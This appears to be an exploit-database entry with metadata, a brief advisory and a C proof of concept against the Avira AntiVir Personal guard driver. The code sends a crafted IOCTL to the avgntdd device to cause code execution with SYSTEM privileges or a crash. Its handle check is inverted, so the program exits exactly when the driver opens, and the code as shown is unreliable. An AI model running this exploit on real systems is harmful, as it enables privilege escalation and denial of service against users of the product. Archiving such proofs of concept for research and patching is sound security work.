Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (1)

Author: D.Elser
type: remote
platform: windows
port: 
date_added: 2011-01-14 
date_updated: 2014-11-13 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

// source: https://www.securityfocus.com/bid/45807/info

Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.

Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.

Please note that these issues affect versions of the application that are no longer supported.

#include <windows.h>

int main(int argc, char* argv[])
{
	char buffer[0x100];
	DWORD returned;
	HANDLE hDevice;

	hDevice = CreateFileW( L"\\\\.\\avgntdd", GENERIC_READ | GENERIC_WRITE, 0, 0, 3, 0x80, 0 );
	if( hDevice != INVALID_HANDLE_VALUE )
	{
		printf("Could not open handle to guard driver.\n");
		return 1;
	}

	memset( buffer, 0, sizeof(buffer) );

	if( !DeviceIoControl( hDevice, 0x0CABA020C, &buffer, sizeof(buffer), 0,0, &returned, 0) )
	{
		printf("Could not communicate with guard driver.\n");
		return 1;
	}
	return 0;
}